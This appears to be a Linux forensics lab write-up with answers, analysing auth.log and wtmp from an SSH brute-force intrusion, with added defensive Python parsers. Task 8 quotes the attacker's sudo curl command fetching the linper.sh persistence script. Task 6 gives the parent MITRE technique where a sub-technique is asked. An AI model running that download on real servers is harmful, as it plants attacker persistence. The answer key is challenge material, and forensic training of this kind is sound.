Category: Linux Forensics, DFIR
This lab provides two files: auth.log and wtmp.
This lab focuses on the auth.log and wtmp files under Linux. It builds familiarity with auth.log in particular, a log file that is routinely examined in forensic investigations.
The auth.log file is used on Linux systems, especially Debian-based distributions, to record authentication-related events: successful and failed login attempts, user switching, sudo command usage, SSH connections, and so on.
Introduction to the fields of auth.log:
- Timestamp: The date and time the log was generated.
- Hostname: The name of the Linux machine.
- Process Name: The name of the process.
- Process ID: The process ID identifier.
- User: The username involved in the authentication process.
- Authentication Status: Detailed description of whether the authentication attempt was successful or failed.
- IP Address: The IP address of the remote connection attempt.
- Message Content: the free-text body of the event. An example line:
Aug 8 12:34:56 hostname sshd[12345]: Failed password for root from 192.168.1.100 port 54321 ssh2
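As an added example (not part of the original writeup), the parser below splits an auth.log line into the fields listed above and then applies the same idea as Task 1: counting failed or invalid-user attempts per source IP to surface a brute-force source, and listing accepted logins. The sample lines, the hostname srv01, the year 2024 (syslog timestamps carry no year) and the threshold value are all constructed assumptions; the IPs come from the documentation ranges 203.0.113.0/24 and 192.0.2.0/24.

```python
import re
from collections import Counter
from datetime import datetime
from typing import Optional

# Syslog-style layout of an auth.log line, as listed above:
#   "<Mon> <day> <HH:MM:SS> <hostname> <process>[<pid>]: <message>"
# The pid is optional: sudo writes "sudo:  user : ..." with no pid.
AUTH_LINE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2})\s+(?P<day>\d{1,2}) (?P<time>\d{2}:\d{2}:\d{2}) "
    r"(?P<host>\S+) (?P<proc>[^\s\[:]+)(?:\[(?P<pid>\d+)\])?:\s*(?P<msg>.*)$"
)
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# The username follows "for" (optionally "for invalid user") or leads "Invalid user".
USER = re.compile(r"(?:\bfor (?:invalid user )?|^Invalid user )(?P<user>\S+)")
MONTHS = {m: i for i, m in enumerate(
    "Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec".split(), start=1)}
FAILED_STATUSES = {"failed", "invalid_user"}


def parse_line(line: str, year: int = 2024) -> Optional[dict]:
    """Split one auth.log line into its fields; None if the line does not match.
    syslog lines carry no year, so `year` is an assumed parameter."""
    m = AUTH_LINE.match(line.rstrip("\n"))
    if not m:
        return None
    msg = m["msg"]
    if msg.startswith("Accepted"):
        status = "accepted"
    elif msg.startswith("Failed password"):
        status = "failed"
    elif msg.startswith("Invalid user"):
        status = "invalid_user"
    else:
        status = None
    ip = IPV4.search(msg)
    user = USER.search(msg)
    ts = datetime(year, MONTHS[m["mon"]], int(m["day"]), *map(int, m["time"].split(":")))
    return {
        "ts": ts.isoformat(),
        "host": m["host"],
        "proc": m["proc"],
        "pid": int(m["pid"]) if m["pid"] else None,
        "status": status,
        "user": user["user"] if user else None,
        "ip": ip.group(0) if ip else None,
        "msg": msg,
    }


def brute_force_sources(lines, threshold: int = 10):
    """Source IPs with at least `threshold` failed/invalid attempts, most active first."""
    counts = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec and rec["status"] in FAILED_STATUSES and rec["ip"]:
            counts[rec["ip"]] += 1
    return [(ip, n) for ip, n in counts.most_common() if n >= threshold]


def successful_logins(lines):
    """(user, ip, timestamp) for every accepted authentication, in log order."""
    out = []
    for line in lines:
        rec = parse_line(line)
        if rec and rec["status"] == "accepted":
            out.append((rec["user"], rec["ip"], rec["ts"]))
    return out


# Constructed sample lines (not from the lab's auth.log).
SAMPLE_LOG = [
    "Mar  6 06:31:33 srv01 sshd[2325]: Invalid user admin from 203.0.113.7 port 46392",
    "Mar  6 06:31:33 srv01 sshd[2325]: Failed password for invalid user admin from 203.0.113.7 port 46392 ssh2",
    "Mar  6 06:31:34 srv01 sshd[2327]: Failed password for root from 203.0.113.7 port 46400 ssh2",
    "Mar  6 06:31:35 srv01 sshd[2329]: Failed password for root from 203.0.113.7 port 46404 ssh2",
    "Mar  6 06:31:40 srv01 sshd[2330]: Accepted password for root from 203.0.113.7 port 46410 ssh2",
    "Mar  6 06:32:44 srv01 sshd[2340]: Accepted publickey for alice from 192.0.2.10 port 50000 ssh2",
    "Mar  6 06:32:44 srv01 systemd-logind[411]: New session 37 of user root.",
    "Mar  6 06:33:00 srv01 sudo:  alice : TTY=pts/1 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/id",
]

if __name__ == "__main__":
    for ip, n in brute_force_sources(SAMPLE_LOG, threshold=3):
        print(f"{n:5d} failed attempts from {ip}")
    for user, ip, ts in successful_logins(SAMPLE_LOG):
        print(f"accepted {user} from {ip} at {ts}")
```

Counting both "Invalid user" and "Failed password" lines means one rejected attempt against a non-existent account is counted twice; that is deliberate here so that the grep on "Invalid user" used in Task 1 and a count of failed passwords both fall out of the same table. On a real log, read the file with `open("auth.log")` and pass the lines in place of SAMPLE_LOG.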
WTMP File
The wtmp file can be viewed on macOS using the utmpdump tool. On a Linux server, you can use the last command to view the wtmp log.
The output of utmpdump contains multiple fields decoded from the binary format of the wtmp file. Here is an introduction to each field:
- Type: This indicates the type of record, such as user login or logout, system startup or shutdown events.
- Process ID: The process identifier associated with the event.
- Line: The terminal line (tty or pts) on which the user logged in.
- Identifier: A short identifier associated with the line field.
- User: The username associated with the event.
- Host: The hostname or IP address of the system the user accessed, if applicable.
- Exit: The exit status of the session or process.
- Session: The session ID.
- Time: The timestamp of the event.
- Address: Additional address information, which may be an IP address in the case of remote logins.
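To make the field list above concrete, here is an added example (not code from the lab or from utmpdump) that decodes raw wtmp records into exactly those fields and then pairs logins with logouts the way `last` does. It assumes the glibc struct utmp layout on x86_64 Linux (384-byte little-endian records); other architectures or libcs can differ. The three records it parses are constructed in the block itself, so nothing here comes from the lab's wtmp.

```python
import socket
import struct
from datetime import datetime, timezone

# Assumed layout: glibc struct utmp on x86_64 Linux, 384 bytes, little-endian.
# Fields in order: ut_type (short, then 2 bytes padding), ut_pid (int), ut_line[32],
# ut_id[4], ut_user[32], ut_host[256], ut_exit (two shorts), ut_session (int),
# ut_tv (tv_sec, tv_usec as two ints), ut_addr_v6 (16 bytes), 20 unused bytes.
UTMP_FMT = "<hxxi32s4s32s256shhiii16s20x"
UTMP_SIZE = struct.calcsize(UTMP_FMT)  # 384

UT_TYPES = {0: "EMPTY", 1: "RUN_LVL", 2: "BOOT_TIME", 3: "NEW_TIME", 4: "OLD_TIME",
            5: "INIT_PROCESS", 6: "LOGIN_PROCESS", 7: "USER_PROCESS",
            8: "DEAD_PROCESS", 9: "ACCOUNTING"}


def _cstr(raw: bytes) -> str:
    # Fixed-width char arrays are NUL padded; cut at the first NUL.
    return raw.split(b"\0", 1)[0].decode("utf-8", "replace")


def _addr(raw: bytes) -> str:
    # An IPv4 address occupies the first 4 bytes; all 16 are used for IPv6.
    if raw[4:] == b"\0" * 12:
        return socket.inet_ntoa(raw[:4]) if raw[:4] != b"\0" * 4 else ""
    return socket.inet_ntop(socket.AF_INET6, raw)


def parse_record(buf: bytes) -> dict:
    """Decode one 384-byte record into the fields listed above."""
    (ut_type, pid, line, ut_id, user, host, e_term, e_exit,
     session, tv_sec, tv_usec, addr) = struct.unpack(UTMP_FMT, buf)
    return {
        "type": UT_TYPES.get(ut_type, str(ut_type)),
        "pid": pid,
        "line": _cstr(line),
        "id": _cstr(ut_id),
        "user": _cstr(user),
        "host": _cstr(host),
        "exit": (e_term, e_exit),
        "session": session,
        "time": datetime.fromtimestamp(tv_sec, tz=timezone.utc).isoformat(),
        "addr": _addr(addr),
    }


def parse_wtmp(data: bytes) -> list:
    """Split a wtmp image into records; a truncated file is reported, not guessed at."""
    if len(data) % UTMP_SIZE:
        raise ValueError("wtmp length is not a multiple of the record size")
    return [parse_record(data[i:i + UTMP_SIZE]) for i in range(0, len(data), UTMP_SIZE)]


def login_sessions(records: list) -> list:
    """Pair each USER_PROCESS with the next DEAD_PROCESS on the same line, like `last`.
    Returns (user, line, host, duration_seconds) for every closed session."""
    open_logins, result = {}, []
    for r in records:
        if r["type"] == "USER_PROCESS":
            open_logins[r["line"]] = r
        elif r["type"] == "DEAD_PROCESS" and r["line"] in open_logins:
            start = open_logins.pop(r["line"])
            secs = int((datetime.fromisoformat(r["time"])
                        - datetime.fromisoformat(start["time"])).total_seconds())
            result.append((start["user"], start["line"], start["host"], secs))
    return result


# --- constructed sample data (not the lab's wtmp) ---
def make_record(ut_type, pid, line, ut_id, user, host, session, tv_sec, ipv4=""):
    addr = (socket.inet_aton(ipv4) + b"\0" * 12) if ipv4 else b"\0" * 16
    return struct.pack(UTMP_FMT, ut_type, pid, line.encode(), ut_id.encode(),
                       user.encode(), host.encode(), 0, 0, session, tv_sec, 0, addr)


T0 = 1709706764  # 2024-03-06 06:32:44 UTC (constructed)
SAMPLE_WTMP = b"".join([
    make_record(2, 0, "~", "~~", "reboot", "6.5.0", 0, T0 - 3600),
    make_record(7, 2340, "pts/0", "ts/0", "root", "203.0.113.7", 37, T0, "203.0.113.7"),
    make_record(8, 2340, "pts/0", "ts/0", "", "", 37, T0 + 279),
])

if __name__ == "__main__":
    for rec in parse_wtmp(SAMPLE_WTMP):
        print(rec)
    for user, line, host, secs in login_sessions(parse_wtmp(SAMPLE_WTMP)):
        print(f"{user} on {line} from {host}: {secs}s")
```

To run it over a real file, replace SAMPLE_WTMP with `open("wtmp", "rb").read()`; the timestamps are decoded as UTC, so compare them with auth.log only after agreeing on a time zone.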
Task1 Can we find the IP address used by the attacker during the brute-force attack by viewing the auth.log log?
grep -E --color=auto "([0-9]{1,3}\.){3}[0-9]{1,3}" auth.log | grep "Invalid user"
65.2.161.68
Task2 Through brute-force attacks, the attacker successfully infiltrated an account on the server. What is the username of this account?
root
Task3 Can you determine the specific time when the attacker personally logged into the server to execute their plan?
The displayed time is 8 hours ahead of the log's time zone, so subtract 8 hours: 14:32:45 - 8:00:00 = 06:32:45
2024-03-06 06:32:45
Task4 SSH sessions are tracked when users log in and assigned a number for each session. In the scenario described in question 2, what number was assigned to the attacker's session after logging in with their account?
grep "root" auth.log
37
Task5 In order to maintain long-term control over the server, the attacker created a new user account and assigned it a higher level of privileges. What is the name of this account?
grep "Accept" auth.log
cyberjunkie
Task6 What is the sub-technique ID used for persistence in MITRE ATT&CK?
https://attack.mitre.org/techniques/T1136
Task7 Based on the previously confirmed login time and the session end time recorded in the authentication log file, can we calculate the duration of the attacker's initial SSH connection in seconds?
From 06:32:45 to 06:37:24 is 4 minutes and 39 seconds:
240 + 39 = 279 seconds
Mar 6 06:32:44 ip-172-31-35-28 systemd-logind[411]: New session 37 of user root.
Mar 6 06:37:24 ip-172-31-35-28 systemd-logind[411]: Session 37 logged out. Waiting for processes to exit.
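The two logind lines quoted above can be paired automatically. The block below is an added example (not part of the writeup) that matches "New session N" against "Session N logged out" and reports the duration, plus the two small clock calculations used in Task 3 and Task 7. Note that the logind pair starts the clock at 06:32:44, giving 280 seconds, while the writeup's 240+39 starts from the 06:32:45 login time established in Task 3; both calculations are shown. The third sample line (session 38) and the year 2024 are assumptions.

```python
import re
from datetime import datetime, timedelta

# systemd-logind lines of the two forms quoted above, behind the usual
# "<Mon> <day> <HH:MM:SS> <host> <proc>[<pid>]:" prefix of auth.log.
SESSION_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2})\s+(?P<day>\d{1,2}) (?P<time>\d{2}:\d{2}:\d{2}) \S+ "
    r"systemd-logind\[\d+\]: (?:New session (?P<new>\d+) of user (?P<user>\S+)\."
    r"|Session (?P<end>\d+) logged out\.)"
)


def _stamp(mon, day, time, year):
    # syslog timestamps carry no year; it is supplied as an assumption.
    return datetime.strptime(f"{year} {mon} {day} {time}", "%Y %b %d %H:%M:%S")


def session_durations(lines, year=2024):
    """Map session id -> (user, start ISO timestamp, seconds) for every session
    that both opened and closed within `lines`; still-open sessions are skipped."""
    open_sessions, closed = {}, {}
    for line in lines:
        m = SESSION_RE.match(line.rstrip("\n"))
        if not m:
            continue
        ts = _stamp(m["mon"], m["day"], m["time"], year)
        if m["new"]:
            open_sessions[int(m["new"])] = (m["user"], ts)
        else:
            sid = int(m["end"])
            if sid in open_sessions:
                user, start = open_sessions.pop(sid)
                closed[sid] = (user, start.isoformat(), int((ts - start).total_seconds()))
    return closed


def seconds_between(start_hms, end_hms):
    """Seconds from one HH:MM:SS clock time to a later one on the same day (Task 7)."""
    fmt = "%H:%M:%S"
    return int((datetime.strptime(end_hms, fmt) - datetime.strptime(start_hms, fmt)).total_seconds())


def to_utc(local_iso, offset_hours):
    """Shift a timestamp displayed in a UTC+offset zone back to UTC (Task 3's 8-hour shift)."""
    return (datetime.fromisoformat(local_iso) - timedelta(hours=offset_hours)).isoformat()


SAMPLE_LINES = [
    # the two lines quoted in Task 7
    "Mar 6 06:32:44 ip-172-31-35-28 systemd-logind[411]: New session 37 of user root.",
    "Mar 6 06:37:24 ip-172-31-35-28 systemd-logind[411]: Session 37 logged out. Waiting for processes to exit.",
    # constructed: a second session that never closes within the sample
    "Mar 6 06:40:00 ip-172-31-35-28 systemd-logind[411]: New session 38 of user alice.",
]

if __name__ == "__main__":
    for sid, (user, start, secs) in session_durations(SAMPLE_LINES).items():
        print(f"session {sid}: {user} from {start}, {secs}s")
    print("Task 7 as in the writeup:", seconds_between("06:32:45", "06:37:24"), "s")
    print("Task 3 in UTC:", to_utc("2024-03-06T14:32:45", 8))
```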
Task8 The attacker logged into their backdoor account and used its higher privileges to download a script. What was the complete command executed with sudo?
/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh